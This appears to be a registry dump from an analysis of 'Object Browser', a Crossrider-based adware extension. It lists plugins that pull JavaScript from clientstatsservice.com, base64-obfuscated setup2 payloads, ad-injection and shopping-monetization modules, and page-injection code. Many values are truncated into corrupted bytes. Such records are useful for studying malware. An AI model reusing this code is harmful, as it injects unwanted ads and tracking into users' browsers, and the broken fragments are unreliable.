    [HKCU\Software\Object Browser\Installer]
    "StatsDomain" = "http://stats.clientstatsservice.com"

    [HKCU\Software\Object Browser\Manifest]
    "UninstallerOfferUrl" = "NA"

    [HKCU\Software\Object Browser\Plugins\182]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/openUrl.js"

    [HKCU\Software\Object Browser\Plugins\177]
    "Name" = "crossriderDashboard"

    [HKCU\Software\Object Browser\Plugins\28]
    "JavaScript" = "var CrossriderInitializerPlugin=(function(e){var c={appId:appAPI._cr_config.appID()},b,g=new e.Deferred(),f;return e.Class.extend({init:function(){b=this;e(document).ready(function(){if(!f){d();}e(body).bindExtensionEvent(__CR_REQUEST_READY,a);});},isReady:function(h){if(h===false){d();}return g.promise();}});function d(){g.resolve();f=true;}function a(){e(body).fireExtensionEvent(__CR_RESPONSE_READY,{appId:c.appId});}}($jquery_171));(function(a){appAPI.initializerPlugin=new CrossriderInitializerPlugin();}($jquery_171));"

    [HKCU\Software\Object Browser\Plugins\7]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/hooks.js"

    [HKCU\Software\Object Browser\Manifest]
    "UpdateInterval" = "360"

    [HKCU\Software\Object Browser\Plugins\4]
    "JavaScript" = "var jQuery = $jquery_171 = $jquery = null;if (document && typeof document.getElementById !== undefined) {/*! jQuery v1.7.1 jquery.com | jquery.org/license */(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f(< a >).appendTo(b),e=d.css(display);d.remove();if(e===none||e===){cl||(cl=c.createElement(iframe),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode===CSS1Compat?:) ),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,display),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject(Microsoft.XMLHTTP)}catch(b){}}function ci(){try{return new a.XMLHtt6"

    [HKCU\Software\Object Browser\Plugins\180]
    "Version" = "10"

    [HKCU\Software\Object Browser\Plugins\217]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/similar_products_m.js"

    [HKCU\Software\Object Browser\Plugins\28]
    "Name" = "initializer"

    [HKCU\Software\Object Browser\Plugins\64]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/appApiMessage.js"

    [HKCU\Software\Object Browser\Code]
    "BgJavaScript" = "/************************************************************************************ This is your background code. For more information please visit our wiki site: http://docs.crossrider.com/#!/guide/scopes_background*************************************************************************************/appAPI.ready(function($) { // Place your code here (ideal for handling browser button, global timers, etc.)});"

    [HKCU\Software\Object Browser\Plugins\36]
    "Version" = "8"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cookies" = "%Documents and Settings%\%current user%\Cookies"

    [HKCU\Software\Object Browser\Plugins\183]
    "Name" = "tabsWrapper"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Paths" = "4"

    [HKCU\Software\Object Browser\Plugins\64]
    "Name" = "appApiMessage"

    [HKCU\Software\Object Browser\Plugins\44]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEMisc.js"

    [HKCU\Software\Object Browser\Plugins\40]
    "Name" = "IEExtension"

    [HKCU\Software\Object Browser\Plugins\44]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(a){appAPI.dns={};appAPI.dns.resolveIP=function(b){return a.resolveIp(b);};appAPI.fetchUrl=function(b){return a.fetchUrl(b);};appAPI.openURL=function(e,d){var c;if(typeof e===object){c=e;if(typeof a.openUrlEx!==undefined){a.openUrlEx(appAPI.JSON.stringify(c));return;}else{d=c.where;e=c.url;}}if(typeof e!==string){console.error(appAPI.openURL - Invalid parameter. Expected string (1st param) but got: (typeof e));return;}if(d!==current&&d!==tab&&d!==window&&d!==popup){console.error(appAPI.openURL - Invalid parameter. Expected current/tab/window (2nd param) but got: d);return;}if(typeof a.openUrlEx!==undefined){var f=(document&&document.documentElement&&document.documentElement.clientHeight)?document.documentElement.clientHeight 100:100;var h=(document&&document.documentElement&&document.documentElement.clientWidth)?document.documentElement.clientWidth 80:100;var g=(window&&window.screenTop)?((window.screenTop-20)<0?0:(window.screenTop-20)ç‘´6"

    [HKCU\Software\Object Browser\Plugins\41]
    "Name" = "IEInfo"

    [HKCU\Software\Object Browser\Plugins\38]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.callbacks.genericEvent=function(e){var d=e.eventContent;if(typeof d===undefined){return;}var a=e.eventName;if(typeof a===undefined){return;}if(typeof appAPI.internal.callbacks[a]===undefined){return;}if(typeof appAPI.internal.callbacks[a].handler!==undefined){var b=appAPI.internal.callbacks[a].handler(d);if(b){return;}}if(typeof appAPI.internal.callbacks[a].listeners===undefined){return;}for(var c in appAPI.internal.callbacks[a].listeners){appAPI.internal.callbacks[a].listeners[c](d,c);}};appAPI.internal.callbacks.addListener=function(b,a,c){if(typeof appAPI.internal.callbacks[b]===undefined){appAPI.internal.callbacks[b]={};appAPI.internal.callbacks[b].listeners={};appAPI.internal.callbacks[b].listenersAdditionalData={};appAPI.internal.callbacks[b].listenersIds=0;appAPI.internal.callbacks[b].numberO"

    [HKCU\Software\Object Browser\Plugins\217]
    "Version" = "18"

    [HKCU\Software\Object Browser\Plugins\1]
    "Version" = "10"

    [HKCU\Software\Object Browser\Plugins\2]
    "JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

    [HKCU\Software\Object Browser\Plugins\93]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MGI2Yjc4NGMxYTFhMTExZTIyMDMxYzQzNGI0ZTUwMDYxMTFhMDc0YjVmNGUwNjE5MDU0MDE2MWIwNzE0MDIwNzE4MWQxYTQwMDYwMTFhNWUwNzEyNWUxZDE0MzEwODBmMWUxZjVlMGIwMjFlNGQwYTA5MWQxODA0MDIwMjE0NTMxYTA2MTMxNDFhMTgxYjE2NTcxYjAxMGIxNzI3MTM0YzExMDMxMjQ4MzEzYTJjMmE0YTJlMmYyMjIzMjEyMTNkMzcyNzMzMzQyMjNlMjIzYjMwMzEyYzJhMjgyZTUyNGQ3YjY3NTAwNjExMWEwNzAyMjUxMzFkNGM0ODRlNDcwNjAzMDUwMDEyNGI0MTVkMTkxMjE5NTkwMjA1MTExNDFjMTQwNzE2MDY1OTEyMWYwYzVlMTkwMTQxMTYwODI4MWMxMTA4MWY0MDE4MWQxNTUxMTMxZDAzMGUwNDFjMTEwYjU4MDYxZjA3MGEwYzE4MDUwNTQ4MTAxZDEyMDMzOTA1NGMwZjEwMGQ0MzJkMjMzODM0NWMyZTMxMzEzYzJhM2QyNDIzMzkyNTM0M2MyZDNkMzAyYzI4MzgzNDNlMmU0YzVlNjQ2YzRjMDcxZDA1MDYxODAwM2IwYTQ3NTQ1NzQ4NDM0ZDdiNGU1MjRlNDU0YzAxMTQwMjE1MTgwZDEzMDI0NzU0NTcyYTUyMTIxOTAxMDIxZTBjMDAxMDUzMmQ2YjBj', 'paqnrnenwq'); }"

    [HKCU\Software\Object Browser\Plugins\14]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/CrossriderUtils.js"

    [HKCU\Software\Object Browser\Plugins\191]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTQ3ZDc5NTMxZjFkMTExYzI2MDcwMzU1NGE1MTU1MDExMTE4MDM0ZjQwNTgwMzA1MTYxZDBjMGY1ZDE2MDYwMjA2MWU1OTBhMGEwMTVjMTgwYTEzMTkxMDU4MWEwMTA3NWMwNTFkMWUxMzE0MDQxOTA0MWUwMTFhMTg1YTQxNWY0MzQ3MDgwNTFkNWIwNTA0NTI1ZDdkNjA0NzA0MDcwMTFmMDQyNTAzMWI0YjVmNGM1MTFkMWIwMzAwMDI0ZDQ2NGExZjE2MTYxYTA1MTU1ZjE0MDAxMDFhMWM1YjBjMTgxZDVlMWEwYzAxMDUxMjVhMWMxMzFiNWUwNzFiMGMwZjE2MDYxZjE2MDIwMzE4MWU0ODVkNWQ0MTQxMWExOTFmNTkwMzE2NGU1ZjdmNjY1NTAwMWQwMjBlMGMwMjNhMTE0ZDRkNTA0MDRlNTg0OTY2NTM1NTRmNTc1MjA3MTIxYjExMDUxMDE0MDM1NTRhNTEyYzRiMTYwNDFjMDUxZjFlMWUxNjU1MzQ0OTY2NTM1NTRmNTc1MjE4MTkwNTBjMDIxNjNmM2M1NTRhNTE1NTAwMDM0YzViMDExNjA3MTUxZTExNDkxMjA1MWQxMTAwMDA1ZTJlMTQwMDEwMWExYzA1MWQxMjE2MDI1NzU0NTg1MTUzNTIxYTE5MTQxNDExMDAwYjA5MTc1MjQ2NTcwNzE4MTkwZDBhMWI1ZDJhMGMxZTA1MDcxODE5MTcwOTE1MDY0ZjRhNTAwYTBhNTI0NTRjMDQxYzAxMTMxZjA2NTkzNjA2MDUwNjAzMDAwNzAyMTQxMTFhNGIxYzAxMWMwYzEyMDMwMTE2MWIxNzAzMDQ1NTUyNTcwYjU2MTQwODA4MWMxMjFjMDgxOTU3NGI1NzRlMDYxZTFjMDYxYzA1MTkxNTEyMWIzYTMzMzAyNzIwMjQyMzIzM2UyZDIwM2UyYzI2M2EzNTJmMzgzMzM2M2E0"

    [HKCU\Software\Object Browser\Installer]
    "srcid" = "000046"

    [HKCU\Software\Object Browser\Manifest]
    "RunInFrame" = "false"

    [HKCU\Software\Object Browser\Installer]
    "FullVersionForUrl" = "1_34_05_12"

    [HKCU\Software\Object Browser\Plugins\260]
    "Name" = "pricedetect_sidebar_m"

    [HKCU\Software\Object Browser\Plugins\211]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MGQ2MTc5NDEwYTA2MGMxYjM4MDAxYTQ5NGE0MzQwMWEwYzFmMWQ0ODU5NDQxMTEwMTAwNDU1MGE0MzEzMWQwYTFkMDIwYjFhMWM0NTAzMTcwMjQ0MDMwNzRkNDM0ZjViNWQ1ZDQ3NWI0NDU2NGMxODBiNDk0MTc4N2Y0OTE4MTcxNjAyMGIzZTFmMWU1NDUxNTA0MTBhMDYwYzFiMWU0ODU5NDQxMTEwMTAwNDU1MGE0MzEzMWQwYTFkMDIwYjFhMWM0NTAzMTcwMjQ0MDMwNzRkNDM0ZjViNWQ1ZDQ3NWI0NDU2NGMxODBiNDk0MTc4N2Y0OTAwMGYxNzE1MTEwNTI0MTY1NDUxNTA1MTUzNDM1NDYxNGQ1MjU2NGI1MjE1MDcwMDBjMDIwZTEzMWE0OTRhNDMzOTUwMTkwZjFlNTAyYjQ3N2E0MzQyNTI1ODQ5MDQxYzFhMDIxZTA2MjgyMTVhNTE0ZDUwMDEwMjFlMDcwZDA1NTYzNDFmMDQwYzVhNDc1MzUyMGE0OTViNTk0NzU2NTY1MDE4NDI1NTA4MWUwZjFlMWYxODE4MDYxMDJkMGIxZTBmMWIxMjRjNGE0MzQ1MmQyNzI4M2YzZDI1MzgyMjJhMjYzNzJhMzQyMTNiMzEyMzI0M2MzMTI3M2EzNDI0MzYyOTM0NTc0MzQ5NTI1ZjViNWQ0MjQ2NWI0MDUzNTI0MjQ4NWI0YTBmNGQ0OTdhMWU=', 'vkpcbrxkmr'); }"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CacheLimit" = "65452"

    [HKCU\Software\Object Browser\Plugins\3]
    "Version" = "2"

    [HKCU\Software\Object Browser\Plugins\37]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEBrowserEvents.js"

    [HKCU\Software\Object Browser\Installer]
    "FullVersion" = "1.34.5.12"

    [HKCU\Software\Object Browser\Plugins\3]
    "JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

    [HKCU\Software\Object Browser\Plugins\44]
    "Version" = "6"

    [HKCU\Software\Object Browser\Plugins\78]
    "JavaScript" = "if(typeof jQuery!==undefined&&(jQuery)&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){(function(d,c,e){var a,b;d.uaMatch=function(h){h=h.toLowerCase();var g=/(opr)[\/]([\w.] )/.exec(h)||/(chrome)[ \/]([\w.] )/.exec(h)||/(firefox)[ \/]([\w.] )/.exec(h)||/(webkit)[ \/]([\w.] )/.exec(h)||/(opera)(?:.*version|)[ \/]([\w.] )/.exec(h)||/(msie) ([\w.] )/.exec(h)||h.indexOf(trident)>=0&&/(rv)(?::| )([\w.] )/.exec(h)||h.indexOf(compatible)<0&&/(mozilla)(?:.*? rv:([\w.] )|)/.exec(h)||[];var f=/(ipad)/.exec(h)||/(iphone)/.exec(h)||/(android)/.exec(h)||/(windows)/.exec(h)||/(mac)/.exec(h)||/(linux)/.exec(h)||/(ubuntu)/.exec(h)||[];return{browser:g[1]||,version:g[2]||0,platform:f[0]||};};a=d.uaMatch(c.navigator.userAgent);b={};if(a.browser){b[a.browser]=true;b.name=(b.rv?msie:a.browser);b.version=a.version;}if(a.platform){b[a.platform]=true;b.os=(a.platform===windows?win:a.platform);}if(b.chrome||b.opr){b.webkit=true;}else{if(b.webkit){b.safari=true;}}if(b.rv){b"

    [HKCU\Software\Object Browser\Plugins\242]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/price_gong_m.js"

    [HKCU\Software\Object Browser\Plugins\207]
    "Name" = "dbWrapper"

    [HKCU\Software\Object Browser\Plugins\177]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/crossriderDashboard.js"

    [HKCU\Software\Object Browser\Plugins\182]
    "Version" = "3"

    [HKCU\Software\Object Browser\Plugins\94]
    "Name" = "IEPopup"

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "E6 B9 17 4E 5A 92 E4 A3 33 02 53 73 84 0C 68 12"

    [HKCU\Software\Object Browser\Plugins\40]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEExtension.js"

    [HKCU\Software\Object Browser\Plugins\246]
    "Version" = "10"

    [HKCU\Software\Object Browser\Manifest]
    "Manifest" = "NA"

    [HKCU\Software\Object Browser\Plugins\40]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.scope=Consts.SCOPE.PAGE;appAPI.internal.callbacks.setEventHandler(externalConsole,function(a){if(appAPI.dom.isIframe()){return;}var c=a.level;var b=a.text;if(typeof c===undefined){console.error(Received undefined Background console level);return;}if(typeof console[c]===undefined){console.error(Received undefined Background console level);return;}if(typeof b===undefined){console.error(Received undefined Background console text);return;}console[c](b);});appAPI.internal.callbacks.setEventHandler(onBeforeNavigate,function(a){});appAPI.internal.callbacks.setEventHandler(windowOpen,function(a){if(appAPI.dom.isIframe()||!appAPI.isActiveTab()){return;}window.open(a.url,a.name,a.specs,a.replace);});try{if(!appAPI.dom.isIframe()){appAPI.internal.activeTabCounter=0;setInterval(function(){if(appAPI.isActi@"

    [HKCU\Software\Object Browser\Plugins\3]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie8_fix_2.js"

    [HKCU\Software\Object Browser\Plugins\39]
    "JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(c){appAPI.cookie=function(h,k,f,i){var g=""%@%ZZCR__AJAXZZ$C@R#"";function e(o,q,l,p){if(typeof(o)!==""string""){return false;}var n=appAPI.JSON.stringify(q);var m=new Date(2030,1,1,0,0,0,0);if(l instanceof Date){m=l;}c.setLocalCookie(o,n,m.toUTCString(),p);return true;}function j(m,n){if(m==""InstallerParams""&&n==""Local""){return appAPI.JSON.parse(appAPI.internal.prefs.getChar(""Params""

    [HKCU\Software\Object Browser\Plugins\7]
    "JavaScript" = "appAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};"

    [HKCU\Software\Object Browser\Plugins\123]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MDg3ODczNGIxODFkMDQxZDMwMDYxZjUwNDA0OTUyMDEwNDE5MTU0ZTVjNWQxMzA3MDQwYzA4MTk0YjFhMTIwNDU3MDUxOTA3MWIxZTRiMTcxYzFmNTUwMzAzNDYxOTAzMTExMTBiMDY1NDAzMDM1NjExMGIwYzEwNGUxMTA4MDYwMzFhMDIwNDAxMTEwMTU0MDkxYzEyMDAxNDUwM2EyYjMwMjAzNTNhMjMzYjM5MjkyMDI2MmMyMTJmMmIyZjIwMzQzMjNhNTIxZTEzMDIwNTE5MDcxYjFlNTg0YzU1MWUxMzA3MWIwYTFmMDEwYTA2NGU1MTRhNTk0MDU5MzYyYjQ3NTg3OTdiNTgwMTA0MWQwMDFlMzAwNjFmNTA0MDQ5NTIwMTA0MTkxNTA3NDk1ZDU1MDAxZTFkMTUxNTExNWExZDEzMGM0NDFjMDAxZTA2MTY1YTEwMWQxNzQ2MWExYTVmMDQwYjAwMTYwYTBlNDcxYTFhNGYwYzAzMWQxNzRmMTkxYjFmMWEwMzFmMGMxMDE2MDA1YzFhMDUwYjE5MDk1ODJiMmMzMTI4MjYyMzNhMjIyNDIxMzEyMTJkMjkzYzMyMzYzOTI5M2EyYjU1MWYxYjExMWMwMDFlMDYxNjQ5NGI1NDE2MDAxZTAyMTMwMjA5MWIwMTRmNTk1OTQwNTk0MDJiMjM1NjVmNzg3MzRiMDAwNTA1MGEwYzFhM2ExNjU4NTM1MDU4NDI1ZTQ5N2U1MzUyNWE0OTUyMWYxNTFmMTExZDEwMTMxNjRiNGE0OTJiNGYwYzFhMDcxNzAyMWQ1MjM0N2ExMA==', 'srzipipmet'); }"

    [HKCU\Software\Object Browser\Plugins\260]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/pricedetect_sidebar_m.js"

    [HKCU\Software\Object Browser\Code]
    "AppJavaScript" = " /************************************************************************************ This is your Page Code. The appAPI.ready() code block will be executed on every page load. For more information please visit our docs site: http://docs.crossrider.com*************************************************************************************/appAPI.ready(function($) { // Place your code here (you can also define new functions above this scope) // The $ object is the extension's jQuery object //sendReport(); setupInjections(); //BlekoEnhancedSearch(); function getPixGuid(){ var aff_id = ; try { var zdata = appAPI.installer.getParams().uzid; $.base64.is_unicode = false; var jsonData = $.base64.decode(zdata); var jsonObj = $.parseJSON(jsonData); if (jsonObj !== null) { aff_id = jsonObj.data.date; } } catch (err) { //In case there's an error - just catch it here, so we'll do things gracefully. D"

    [HKCU\Software\Object Browser\Plugins\41]
    "Version" = "7"

    [HKCU\Software\Object Browser\Plugins\46]
    "Version" = "5"

    [HKCU\Software\Object Browser\Plugins\78]
    "Name" = "CrossriderInfo"

    [HKCU\Software\Object Browser\Plugins\94]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEPopup.js"

    [HKCU\Software\Object Browser\Plugins\260]
    "Version" = "2"

    [HKCU\Software\Object Browser\Manifest]
    "DisableIe" = "true"

    [HKCU\Software\Object Browser\Plugins\43]
    "Name" = "IEMessaging"

    [HKCU\Software\Object Browser\Plugins\21]
    "Name" = "debug"

    [HKCU\Software\Object Browser\Plugins\94]
    "JavaScript" = "appAPI.isBackground=false;appAPI.tabId=POPUP;appAPI.internal.scope=Consts.SCOPE.POPUP;appAPI.browserAction.setBadgeBackgroundColor=function(a){if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Expected an array but got: (typeof a));return;}if(a.length!==4){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Color array should have 4 members (RGBA));return;}appAPI.internal.message.send({eventName:onSetBadgeColorFromPopup,eventContent:a});};appAPI.browserAction.setBadgeText=function(c,a){var b={};if(typeof c!==string){console.error(appAPI.browserAction.setIcon - Invalid parameter. Expected string (1st param) but got: (typeof c));return;}b.text=c;if(typeof a===undefined||a===null){b.color=null;}else{if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeText - Invalid parameter. Expected an array (2nd param) but got: (typeof a));return;}else{if(a.length!==4){console.error(appAPI.browserAction.se6D"

    [HKCU\Software\Object Browser\Plugins\9]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/searchengines_hook.js"

    [HKCU\Software\Object Browser\Plugins\104]
    "JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[104] = function() { if (!appAPI.internal.monetization.shouldRunByVertical(104, [shopping])){ return; } var app_id='0'; var uid='0'; var app_name = ''; try{app_name = '&name=' encodeURIComponent(appAPI.appInfo.name);} catch(e) {app_name='';} try{app_id = appAPI.appInfo.id;}catch(err){} if (appAPI && appAPI.installer && appAPI.installer.getParams) { app_id = appAPI.installer.getParams().source_id; } if(appAPI && appAPI.installer && appAPI.installer.getUserId){uid=appAPI.installer.getUserId();} var token = appAPI.db.get(jw_token); if(token === '' || token===null || token === undefined){ var S4 = function() {return (((1 Math.random())*0x10000)|0).toString(16).substring(1);}; token=(S4() S4() - S4() - S4() - S4() - S4() S4() S4()); appAPI.db.set(jw_token,tokeD"

    [HKCU\Software\Object Browser\Plugins]
    "BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64,72"

    [HKCU\Software\Object Browser\Plugins\246]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/setup.js"

    [HKCU\Software\Object Browser\Plugins\182]
    "JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var c={DUMMY_PAGE_URL:http://page.our-app.net/blank/resource.html};(function(){if(appAPI&&appAPI.internal&&appAPI.internal.hosts&&typeof appAPI.internal.hosts.dummyPageUrl===string&&appAPI.internal.hosts.dummyPageUrl.length>0){c.DUMMY_PAGE_URL=appAPI.internal.hosts.dummyPageUrl;}}());appAPI.openURL=(function(){var d=appAPI.openURL;var e=function(g){d({url:c.DUMMY_PAGE_URL ?appid= appAPI.appInfo.id &resourcepath= escape(g.resourcePath) &rnd= (new Date()).getTime(),where:g.where,focus:g.focus,focusTimer:g.focusTimer,left:g.left,top:g.top,height:g.height,width:g.width});};var f=function(g){if(!appAPI.utils.isObject(g)){return;}if(!appAPI.utils.isDefined(g.resourcePath)){d(g);return;}e(g);};return function(h,g){var i=h;try{if(appAPI.utils.isString(h)){d(h,g);return;}f(i);}catch(j){}};}());var a=function(){(function(){var f=document.createElement(link);f.type=image/x-icon;f.rel=shortcut icon;f.href=;document.getElementsByTagName(head)[0];"

    [HKCU\Software\Object Browser\Plugins\43]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}if(typeof appAPI.internal.message===undefined){appAPI.internal.message={};}appAPI.internal.message.send=function(b){if(typeof b!==object){return false;}if(typeof b.eventName!==string){return false;}b.senderTabId=appAPI.tabId;var c;try{c=appAPI.JSON.stringify(b);}catch(a){console.error(appAPI.message error - Caught a JSON exception when trying to stringify the message);return false;}if(typeof c!==string){console.error(appAPI.message error - Failed to stringify message);return false;}if(c.length>8192){console.error(appAPI.message error - can't send message because content is too long: c.length);return false;}appAPIinternal.msgToAllTabs(c);return true;};appAPI.internal.callbacks.crossBhoEvent=function(b){if(typeof b.msgObj!==string){return;}try{b=appAPI.JSON.parse(b.msgObj);}catch(c){console.error(Failed to parsp6"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CacheLimit" = "65452"

    [HKCU\Software\Object Browser\Plugins\242]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MGI2YjdlNTIxYzAyMTAxNzNjMDIxYzQzNGQ1MDU2MWUxMDEzMTk0YTVmNGUxZTFlMDcwMjRhMTQwMTFmMDAxMTFlMWUxMzE3MTAwMjQ3MTkxZTA3MTg1ZjFlMDU0YjE0MGUyZjEyMDY1OTFhMDc0OTI1MjEyZjM5M2MyODM2MjQzMTI5MmQyMzU0MTMwMjEyMDUxNDA2NTAzNzMyMmIyZjM0MjgyNDI0MjYzZjI2MzIzZDM1MjIzZTNlMzQ0OTI5M2IyNDNiM2YyMzMyMjUzOTMwMzMzNjM4M2EyNTMyM2UzZTM0MmIyOTQyMjUzYjMxM2UyNTI4MzQzZDI1MzQyYjI4MjkyZjJmMzYzZDMxNGIzYjM4MmEyMjNmMzIyNDIyM2QzMjIxMzUzNjMxMjAzMTI4M2UzNTNiMjEzODM2NTI1YzZiN2U1MjFjMDIxMDE3MWEyNTAyMGQ1NTRhNTQ1NDBjMTMxZDAwMDM1YjU4NWYxZDE4MTcxMzQ3MDMxODBlMDcwMDFkMTgwMzA2MWQxNTVlMDgxOTE2MWI1OTBlMTQ0NjAzMTczZTE1MTc1YTFjMTc1ODI4MzYzNjI4M2IzOTM1MjIyMTM4MjAzNDRkMDIwNTAzMDYxMjE2NDEzYTI1MzIzZTMzMzkyNzIyMzYyZTJiMjUyNDI0MjUyZjNkMzI1OTM4MzYzMzIyMmUyNDIzMjYzZjIwMjIzYjJmMjMzNDM1MmYzZDMyM2IzODRmMzIyMjIwMzkzNDJiMzIyZDM0MzkzYzMxMzgyODNlMzUzYjIxNWEzNjJmMzMzMzM4MjMyNzI0MmQyMzJjMjIyZjIwMjcyMDJiMzgyNTJhMmMyZjJmNDM1YjdhN2Q1NDE0MGIxYzE3MTkwZjNlMTQ1NjRjNDQ1NTVkNDI1YzZiNTc1MDU0NTY0NjExMGMwMjA0MDgxNDExMTg1NDVlNDczMjUyMDMwOTE4MDAwNDFmMGE;"

    [HKCU\Software\Object Browser\Plugins\17]
    "JavaScript" = "if(typeof window!==undefined){/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2010, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Sat Feb 13 22:33:48 2010 -0500 */var $$jquery;(function(aO,D){var a=function(e,a0){return new a.fn.init(e,a0);},o=aO.jQuery,S=aO.$,ac=aO.document,Y,Q=/^[^<]*(<[\w\W] >)[^>]*$|^#([\w-] )$/,aY=/^.[^:#\[\.,]*$/,az=/\S/,N=/^(\s|\u00A0) |(\s|\u00A0) $/g,f=/^<(\w )\s*\/?>(?:<\/\1>)?$/,b=navigator.userAgent,v,L=false,af=[],aI,av=Object.prototype.toString,ar=Object.prototype.hasOwnProperty,h=Array.prototype.push,G=Array.prototype.slice,t=Array.prototype.indexOf;a.fn=a.prototype={init:function(e,a2){var a1,a3,a0,a4;if(!e){return this;}if(e.nodeType){this.context=this[0]=e;this.length=1;return this;}if(e===body&&!a2){this.context=ac;this[0]=ac.body;this.se"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "AppData" = "%Documents and Settings%\%current user%\Application Data"

    [HKCU\Software\Object Browser\Plugins\123]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/intext_adv_m.js"

    [HKCU\Software\Object Browser\Manifest]
    "BgVersion" = "1"

    [HKCU\Software\Object Browser\Plugins\21]
    "JavaScript" = "var CrossriderDebugManager=(function(h){var f={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.debug_app};return h.Class.extend({init:function(){if(appAPI.isMatchPages.apply(this,f.url.debug_page)){h(document).ready(function(){h(body).bindExtensionEvent(debug_request_data,function(j,i){if(i.appId==f.appId){e();}});h(body).bindExtensionEvent(debug_request_reload_background,function(j,i){if(i.appId==f.appId&&appAPI.internal.reloadBackground){appAPI.internal.reloadBackground();}});h(body).bindExtensionEvent(debug_request_reload_plugins,function(j,i){if(i.appId==f.appId){appAPI.resources.requestReload();setTimeout(appAPI.internal.forceUpdate,750);}});h(body).bindExtensionEvent(debug_mode_activate,function(j,i){if(i.appId==f.appId){b(i);}});h(body).bindExtensionEvent(debug_mode_deactivate,function(j,i){if(i.appId==f.appId){d();}});h(body).bindExtensionEvent(debug_request_database,function(j,i){if(i.appId==f.appId){c(i);}});h(body).bindExtensionEvent(debug_request_database_remove,ä–‹D"

    [HKCU\Software\Object Browser\Plugins\191]
    "Name" = "ciuvo_m"

    [HKCU\Software\Object Browser\Plugins\104]
    "Name" = "jollywallet_m"

    [HKCU\Software\Object Browser\Plugins\184]
    "Name" = "noproblemppc_m"

    [HKCU\Software\Object Browser\Manifest]
    "PublisherName" = "Object Browser"

    [HKCU\Software\Object Browser\Plugins]
